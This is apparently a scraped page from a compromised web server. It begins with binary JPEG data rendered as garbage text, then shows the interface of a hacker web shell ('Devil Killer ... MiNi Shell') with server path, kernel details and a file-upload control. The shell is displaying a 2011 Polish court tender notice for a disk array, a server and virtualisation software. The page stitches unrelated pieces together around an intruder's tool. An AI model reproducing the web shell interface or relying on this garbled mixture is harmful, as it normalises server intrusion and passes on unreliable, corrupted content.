JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/321021-N-2011.html

<p class="kh_header"><b>Tarnów: dostawa macierzy dyskowej, serwera oraz oprogramowania do wirtualizacji dla Sądu Okręgowego w Tarnowie</b><br>
<b>Numer ogłoszenia: 321021 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Tarnowie , ul. J. Dąbrowskiego 27, 33-100 Tarnów, woj. małopolskie, tel. 014 688 74 05, faks 014 688 74 89.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnow.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa macierzy dyskowej, serwera oraz oprogramowania do wirtualizacji dla Sądu Okręgowego w Tarnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Macierz dyskowa
1.	Macierz musi posiadać moduły odpowiedzialne za obsługę protokołów iSCSI, CIFS, NFS (wersje V2, V3) oraz FTP.
2.	Macierz musi być wyposażona w redundantne kontrolery odpowiedzialne za obsługę zarządzanej przestrzeni dyskowej, jej konfigurację, liczenie RAID oraz obsługę protokołów wymienionych w punkcie 1.
3.	Moduły obsługujące przestrzeń dyskową muszą być wyposażone w pamięć o pojemności, co najmniej 4 GB DDR3 każdy. Pamięć cache zapisu musi być zabezpieczona mechanizmem mirroringu. 
4.	Wymagana jest redundancja wszystkich komponentów macierzy, tj.: kontrolerów, ścieżek do dysków, zasilaczy, wentylatorów, podwójnych połączeń pomiędzy kontrolerami macierzowymi, służących do mirrorowania zawartości pamięci cache.
5.	Macierz musi umożliwiać zabezpieczenie danych rezydujących w pamięci cache zapisu przed ich utratą, na wypadek zaniku zasilania, na czas nieograniczony np. mechanizmem zapisu zawartość pamięci cache zapisu na dyski wewnętrzne.
6.	Macierz musi współpracować równocześnie z dyskami SAS, jak i tańszymi dyskami Near Line SAS. Macierz musi być wyposażona, w co najmniej 6 dysków SAS o pojemności 600 GB SAS i prędkości obrotowej 15k rpm.
7.	Macierz musi umożliwiać pracę dysków SAS oraz Near Line SAS w jednej półce dyskowej.
8.	Macierz musi pozwalać na rozbudowę, do co najmniej 96 dysków twardych. Dodawanie kolejnych dysków, jak i kolejnych półek dyskowych powinno odbywać się w trybie on-line.
9.	Każdy dysk musi posiadać dwa porty do komunikacji, po jednym do każdego kontrolera. Połączenia między dyskami, a kontrolerami muszą być wykonane w technologii SAS 6Gbps.
10.	Macierz musi zapewniać wsparcie dla następujących poziomów RAID: 10, 5, 6.
11.	Macierz musi pozwalać na dedykowanie globalnych dysków Hot Spare, z możliwością dowolnego rozmieszczenia ich w obrębie macierzy.
12.	Macierz musi mieć możliwość tymczasowego wyłączenia nieużywanych dysków NL SAS (drive spindown) w celu oszczędzania energii elektrycznej.
13.	Macierz musi obsługiwać mechanizmy LUN Masking i LUN Mapping.
14.	Macierz musi pozwalać na tworzenie, co najmniej 256 LUN-ów iSCSI.
15.	Macierz powinna oferować funkcjonalność obsługiwania, co najmniej 10 tzw. target-ów iSCSI na każdym z dostępnych portów Ethernet.
16.	Macierz musi oferować funkcjonalność rozszerzania grup RAID o dodatkowe dyski on-line, bez przerwy w dostępie do LUN-ów rezydujących na tej grupie RAID.
17.	Macierz musi pozwalać na migrowanie LUN-ów pomiędzy różnymi typami grup RAID w trybie on-line, z ciągłym dostępem do danych dla serwerów korzystających z migrującego LUNa.
18.	Upgrade firmware-u i oprogramowania kontrolerów macierzy musi odbywać się bezprzerwowo, z ciągłym dostępem do danych.
19.	Oferowane urządzenie musi być wyposażone, w co najmniej:
a.	4 porty typu 1GbE miedziany do komunikacji z hostami,
b.	2 porty typu  1GbE miedziany do zarządzania.
c.	4 porty SAS 6Gbps do komunikacji z półkami dyskowymi.
d.	2 porty USB.
20.	Oferowane urządzenie musi umożliwiać rozbudowę o dodatkowe 8 portów typu 1GbE miedziany do komunikacji z hostami.
21.	Urządzenie powinno zapewniać wsparcie dla funkcjonalności agregacji portów IEEE 802.3ad lub Cisco EtherChannel oraz definiowania portów VLAN IEEE 802.1q.
22.	Macierz powinna umożliwiać utworzenie przynajmniej 256 systemów plików.
23.	Macierz powinna zapewniać utworzenie przynajmniej 300 udziałów CIFS oraz 300 exportów NFS.
24.	Urządzenie NAS ma obsługiwać mechanizm snapshot-ów w trybie do zapisu i odczytu, wykonywanych z poziomu macierzy. Wymagane jest, aby macierz pozwalała na wykonywanie, co najmniej 96 kopii migawkowych, istniejących na niej systemów plików. Mechanizm snapshot-ów ma umożliwiać przywrócenie zawartości całego systemu plików bazując na jego snapshot-cie. Licencja umożliwiająca wykorzystanie powyższej funkcjonalności jest obecnie przedmiotem oferty.
25.	Dane z kopii migawkowych (wskaźniki itp.) mają być składowane na osobnych dedykowanych zasobach dyskowych, a nie razem z danymi produkcyjnymi.
26.	Operacje wykonywane (tworzenie, usuwanie) na snapshotach nie mogą wpływać na stan danych produkcyjnych, w tym nie mogą powodować fragmentacji zasobów produkcyjnych.
27.	Rozwiązanie ma pozwalać na automatyczne zwiększanie przestrzeni dla kopii migawkowych.
28.	Przepełnienie przestrzeni dla kopii migawkowych nie może powodować błędów zapisu na przestrzeń produkcyjną.
29.	Możliwość definiowania automatycznej polityki tworzenia kopii migawkowych z wykorzystaniem interwału czasowego.
30.	W przypadku odtworzenia danych z dowolnej kopii migawkowej, urządzenie musi pozwalać na poprawne zachowanie także wcześniejszych jak i późniejszych snapshotów, z zachowaniem możliwości kolejnego odtworzenia danych zarówno ze wszystkich istniejących (starszych i nowszych) kopii dostępnych dla danego zasobu.
31.	Obsługa mechanizmu zagnieżdżania systemów plików dla użytkowników NFS i CIFS, gdzie wiele osobnych systemów plików jest prezentowane do użytkowników, jako jeden system plikowy.
32.	Dla LUN-ów będących widocznych dla serwerów po protokole iSCSI, zamawiający wymaga funkcjonalności tworzenia snapshot-ów pojedynczych LUN-ów (kopii point in time), wykonywanych z poziomu macierzy.
33.	Możliwość integracji snapshot-ów z mechanizmem VSS Microsoft. Licencja umożliwiająca wykorzystanie powyższej funkcjonalności nie jest obecnie przedmiotem oferty.
34.	Macierz musi zapewniać mechanizm thin provisioning, który polega na udostępnianiu większej przestrzeni logicznej niż jest to fizycznie alokowane w momencie tworzenia zasobu. W przypadku zbliżenia się do fizycznych granic systemu plików, musi istnieć możliwość automatycznego jego rozszerzenia bez konieczności interwencji administratora. Licencja umożliwiająca wykorzystanie powyższej funkcjonalności jest obecnie przedmiotem oferty.
35.	Macierz musi zapewniać mechanizm deduplikacji wraz z kompresjią danych dla systemów plików o wielkości, co najmniej 16TB w celu optymalizacji wykorzystania przestrzeni dyskowej. Licencja umożliwiająca wykorzystanie powyższej funkcjonalności jest obecnie przedmiotem oferty.
36.	Macierz musi wspierać mechanizm zdalnej replikacji z poziomu macierzy na drugą zapasową macierz, w trybie synchronicznym lub asynchronicznym). Licencja umożliwiająca wykorzystanie powyższych funkcjonalności nie jest przedmiotem oferty.
37.	Urządzenie musi oferować funkcjonalność retencji (WORM) na poziomie pojedynczych plików, jak i całych systemów plików. Licencja umożliwiająca wykorzystanie powyższych funkcjonalności nie jest przedmiotem oferty.
38.	Serwer musi obsługiwać protokół DFS. Serwer powinien móc pracować zarówno we współpracy z innymi serwerami DFS, jak również jako niezależny serwer DFS root.
39.	Dla celów współpracy z systemem backupu, serwer plików musi obsługiwać protokół NDMP w wersjach 1 - 4.
40.	Serwer plikowy ma również współpracować z rozwiązaniami antywirusowymi firm trzecich (np. McAfee, Norton, Trend, CA, Sophos). Licencja umożliwiająca wykorzystanie powyższych funkcjonalności nie jest przedmiotem oferty.
41.	Urządzenie musi współpracować zarówno z protokołem Active Directory, LDAP, Kerberos, Secure NFS jak i NIS.
42.	Macierz powinna posiadać wsparcie dla systemów operacyjnych takich jak: Microsoft Windows Server 2003, 2008, 2008 R2+, Windows 7, Windows Vista, Microsoft Hyper-V, VMware ESX, RedHat Enterprise Linux, Novell Suse Enterprise Linux, Solaris 10 x86.
43.	Macierz musi umożliwiać zarządzanie zarówno z poziomu linii komend (CLI), jak również poprzez jeden interfejs graficzny (GUI).
44.	Oprogramowanie do zarządzania macierzą musi rezydować na macierzy, bez konieczności dedykowania osobnego serwera dla potrzeb obsługi oprogramowania zarządzającego.
45.	Dostarczone urządzenie ma być produktem fabrycznie nowym, dostarczonym poprzez autoryzowany kanał sprzedaży producenta na terenie Polski.
46.	Macierz musi być objęta gwarancją na sprzęt jak i oprogramowanie przynajmniej na trzy lata. Gwarancja ma być świadczona w trybie 24x7 z  4 - godzinnym czasem reakcji.
47.	Wymaga się, aby uszkodzone dyski twarde, po wymienieniu na nowe, pozostawały u zamawiającego.
48.	Wymaga się, aby macierz była dostarczona wraz z oprogramowaniem umożliwiającym zdalne monitorowanie macierzy przez organizację serwisową producenta. Usługa taka ma być świadczona w ramach oferowanej gwarancji.

II.	Serwer
Parametr	Charakterystyka (wymagania minimalne)
Obudowa	Maksymalnie 2U do instalacji w standardowej szafie RACK 19 cali, dostarczona wraz z szynami.
Płyta główna	Płyta główna z możliwością zainstalowania do dwóch procesorów, dwu, cztero, sześciordzeniowych. Płyta główna musi być zaprojektowana przez producenta serwera i oznaczona jego znakiem firmowym
Chipset	Dedykowany przez producenta procesora do pracy w serwerach dwuprocesorowych
Procesor	Dwa procesory sześciordzeniowe klasy x86 dedykowane do pracy w serwerach zaprojektowane do pracy w układach dwuprocesorowych, taktowane zegarem co najmniej 2.66GHz, pamięć L3 12MB każdy lub procesor równoważny wydajnościowo. 
W przypadku zaoferowania procesora równoważnego Zamawiający zastrzega możliwość przeprowadzenia testów i w związku z tym,  oferent zobowiązany będzie do dostarczenia zamawiającemu oprogramowania testującego. 
RAM	16GB DDR3 LV RDIMM, płyta główna powinna umożliwiać obsługę do 128GB
Zabezpieczenia pamięci RAM	ECC, Memory Mirror
Gniazda PCI	Minimum 3 złącza PCIe drugiej generacji w tym minimum 1 x PCI-E x8 i 2 x PCI-E x4.
Interfejsy sieciowe	Minimum 2 wbudowane porty typu 10, 100, 1000 RJ-45. 
Napęd optyczny	Wewnętrzny napęd DVD-ROM
Dyski twarde 	Możliwość instalacji dysków SATA, SAS, SSD. Zainstalowane 4 dyski 450GB typu Hot-Plug SAS   15krpm skonfigurowane w RAID10. Możliwość instalacji dodatkowych 4 dysków twardych Hot-Plug.
Kontroler RAID	Dedykowany, posiadający minimum 256MB pamięci cache z podtrzymaniem bateryjnym umożliwiający następujące konfiguracje RAID: 0, 1, 5, 10 ,50, 6, 60
Porty	6 x USB 2.0 z czego 2 na przednim panelu obudowy, 2 na tylnym panelu obudowy i dwa wewnętrzne, VGA
Video	Zintegrowana karta graficzna, umożliwiająca rozdzielczość min. 1280x1024. 
Zasilacze	Redundantne minimum 750W każdy
Bezpieczeństwo	Zintegrowany z płytą główną moduł TPM.
Napęd USB	Wewnętrzny klucz USB umożliwiający instalację hypervisora
Diagnostyka	Panel LCD umieszczony na froncie obudowy, umożliwiający wyświetlenie informacji o stanie procesora, pamięci, dysków, BIOSu.
Karta Zarządzania	Niezależna od zainstalowanego na serwerze systemu operacyjnego posiadająca dedykowane złącze RJ-45 i umożliwiająca:
1.	zdalny dostęp do graficznego interfejsu Web karty zarządzającej
2.	zdalne monitorowanie i informowanie o statusie serwera (m.in. prędkości obrotowej wentylatorów, konfiguracji serwera, )
3.	szyfrowane połączenie (SSLv3) oraz autentykacje i autoryzację użytkownika
4.	możliwość podmontowania zdalnych wirtualnych napędów
5.	wirtualną konsolę z dostępem do myszy, klawiatury
6.	wsparcie dla IPv6
7.	wsparcie dla WSMAN (Web Service for Managament); SNMP; IPMI2.0, VLAN tagging, Telnet, SSH
8.	możliwość zdalnego monitorowania w czasie rzeczywistym poboru prądu przez serwer
9.	możliwość zdalnego ustawienia limitu poboru prądu przez konkretny serwer
10.	integracja z Active Directory
11.	możliwość obsługi przez dwóch administratorów jednocześnie
12.	wsparcie dla dynamic DNS
13.	wysyłanie do administratora maila z powiadomieniem o awarii lub zmianie konfiguracji sprzętowej
14.	możliwość podłączenia lokalnego poprzez złącze RS-232
Certyfikaty	Serwer musi być wyprodukowany zgodnie z normą  ISO-9001 oraz ISO-14001 oraz deklaracją CE.
Oferowany serwer musi znajdować się na liście Windows Server Catalog i posiadać status Certified for Windows dla MS Windows Server 2008 w wersji x86, x64 i R2 x64.
Warunki gwarancji	Przynajmniej trzy lata gwarancji z czasem reakcji do czterech godzin od zgłoszenia. 
Firma serwisująca musi posiadać ISO 9001:2000 na świadczenie usług serwisowych oraz posiadać autoryzację producenta serwera.
W przypadku awarii dysku twardego uszkodzony nośnik pozostaje u Zamawiającego.
Dokumentacja użytkownika	Zamawiający wymaga dokumentacji w języku polskim lub angielskim.
Zamawiający wymaga możliwość telefonicznego sprawdzenia konfiguracji sprzętowej serwera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela.

III.	Oprogramowanie do wirtualizacji
1.	Warstwa wirtualizacji musi być zainstalowana bezpośrednio na sprzęcie fizycznym bez dodatkowych pośredniczących systemów operacyjnych
2.	Licencje powinny obejmować min. trzy co najmniej dwuprocesorowe serwery i powinny umożliwiać obsługę 32 GB pamięci wirtualnej vRAM per procesor czyli 192 GB pamięci wirtualnej vRAM łącznie (pamięć wirtualna vRAM to pamięć, która jest wykorzystywana przez włączone wirtualne maszyny).  
3.	Rozwiązanie musi zapewnić możliwość obsługi wielu instancji systemów operacyjnych na jednym serwerze fizycznym i powinno się charakteryzować maksymalnym możliwym stopniem konsolidacji sprzętowej.
4.	Oprogramowanie do wirtualizacji musi zapewnić możliwość skonfigurowania maszyn wirtualnych 1-8 procesorowych.
5.	Oprogramowanie do wirtualizacji musi zapewnić możliwość skonfigurowania maszyn wirtualnych 
z możliwością przydzielenia do 1 TB pamięci operacyjnej RAM.
6.	Oprogramowanie do wirtualizacji musi zapewnić możliwość skonfigurowania maszyn wirtualnych 
z których każda może mieć 1-10 wirtualnych kart sieciowych.
7.	Oprogramowanie do wirtualizacji musi zapewnić możliwość skonfigurowania maszyn wirtualnych 
z których każda może mieć co najmniej 4 porty szeregowe i 3 porty równoległe i 20 urządzeń USB .
8.	Rozwiązanie musi umożliwiać łatwą i szybką rozbudowę infrastruktury o nowe usługi bez spadku wydajności i dostępności pozostałych wybranych usług.
9.	Rozwiązanie powinno w możliwie największym stopniu być niezależne od producenta platformy sprzętowej.
10.	Polityka licencjonowania musi umożliwiać przenoszenie licencji na oprogramowanie 
do wirtualizacji pomiędzy serwerami różnych producentów z zachowaniem wsparcia technicznego 
i zmianą wersji oprogramowania na niższą (downgrade). Licencjonowanie nie może odbywać się 
w trybie OEM.
11.	Rozwiązanie musi wspierać następujące systemy operacyjne: MS-DOS 6.22,  Windows 3.1, Windows 95, Windows 98, Windows XP, Windows Vista , Windows NT 4.0, Windows 2000, Windows Server 2003, Windows Server 2008, Windows 7,  SLES 10, SLES9, SLES8, Ubuntu 7.04, RHEL 5, RHEL 4, RHEL3, RHEL 2.1, Solaris 10, Solaris 9, Solaris 8, OS 2 Warp 4.0, NetWare 6.5, NetWare 6.0, NetWare 6.1, Debian, CentOS, FreeBSD, Asianux, Ubuntu 7.04, SCO OpenServer, SCO Unixware, FreeBSD, Mac OS X.
12.	Rozwiązanie musi umożliwiać przydzielenie większej ilości pamięci RAM dla maszyn wirtualnych niż fizyczne zasoby RAM serwera w celu osiągnięcia maksymalnego współczynnika konsolidacji.
13.	Rozwiązanie musi umożliwiać udostępnienie maszynie wirtualnej większej ilości zasobów dyskowych niż jest fizycznie zarezerwowane na dyskach lokalnych serwera lub na macierzy. 
14.	Rozwiązanie powinno posiadać centralną konsolę graficzną do zarządzania maszynami wirtualnymi  i do konfigurowania innych funkcjonalności. Centralna konsola graficzna powinna mieć możliwość działania zarówno jako aplikacja na maszynie fizycznej lub wirtualnej jak i jako gotowa, wstępnie skonfigurowana maszyna wirtualna tzw. virtual appliance.  
15.	Rozwiązanie musi zapewnić możliwość bieżącego monitorowania wykorzystania zasobów fizycznych infrastruktury wirtualnej (np. wykorzystanie procesorów, pamięci RAM, wykorzystanie przestrzeni na dyskach, wolumenach) oraz przechowywać i wyświetlać dane maksymalnie sprzed roku. 
16.	Oprogramowanie do wirtualizacji powinno zapewnić możliwość wykonywania kopii migawkowych instancji systemów operacyjnych (tzw. snapshot) na potrzeby tworzenia kopii zapasowych bez przerywania ich pracy.
17.	Oprogramowanie do wirtualizacji musi zapewnić możliwość klonowania systemów operacyjnych wraz z ich pełną konfiguracją i danymi.
18.	Oprogramowanie do wirtualizacji oraz oprogramowanie zarządzające musi posiadać możliwość integracji z usługami katalogowymi Microsoft Active Directory.
19.	Rozwiązanie musi zapewniać mechanizm bezpiecznego uaktualniania warstwy wirtualizacyjnej (np. wgrywania krytycznych poprawek) bez potrzeby wyłączania wirtualnych maszyn.
20.	Rozwiązanie musi zapewniać taki mechanizm bezpiecznego uaktualniania aplikacji i systemów operacyjnych wirtualnych maszyn, poprzez który można wprowadzać poprawki na pojedyncze wirtualne maszyny jak i na całe grupy wirtualnych maszyn. Dla bezpieczeństwa wspomniany mechanizm musi pozwalać na automatyczne wykonywanie kopii migawkowych przed aktualizacją.
21.	Oprogramowanie do wirtualizacji musi obsługiwać przełączenie ścieżek SAN (bez utraty komunikacji) w przypadku awarii jednej z kilku dostępnych ścieżek.
22.	Rozwiązanie musi mieć możliwość przenoszenia maszyn wirtualnych w czasie ich pracy pomiędzy serwerami fizycznymi. Mechanizm powinien umożliwiać 4 lub więcej takich procesów przenoszenia jednocześnie.
23.	Musi zostać zapewniona odpowiednia redundancja i taki mechanizm (wysokiej dostępności HA) aby w przypadku awarii  lub niedostępności serwera fizycznego wybrane przez administratora 
i uruchomione nim wirtualne maszyny zostały uruchomione na innych serwerach z zainstalowanym oprogramowaniem wirtualizacyjnym. 
24.	System musi posiadać funkcjonalność wirtualnego przełącznika (virtual switch) umożliwiającego tworzenie sieci wirtualnej w obszarze hosta i pozwalającego połączyć maszyny wirtualne w obszarze jednego hosta, a także na zewnątrz sieci fizycznej. Pojedynczy przełącznik wirtualny  powinien mieć możliwość konfiguracji do 4000 portów.
25.	Pojedynczy wirtualny przełącznik musi posiadać możliwość przyłączania do niego dwóch  i więcej fizycznych kart sieciowych aby zapewnić bezpieczeństwo połączenia ethernetowego w razie awarii karty sieciowej.
26.	Wirtualne przełączniki muszą obsługiwać wirtualne sieci lokalne (VLAN).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2, 48.82.10.00-9, 48.21.00.00-3, 48.21.40.00-1, 30.23.31.41-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie pobiera (art. 45 ust. 1 ustawy Pzp)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia
Zamawiający żąda załączenia do oferty wykazu wykonanych lub wykonywanych (w przypadku świadczeń okresowych lub ciągłych) przez Wykonawcę w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch dostaw serwera o wartości minimum 20.000 zł brutto każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

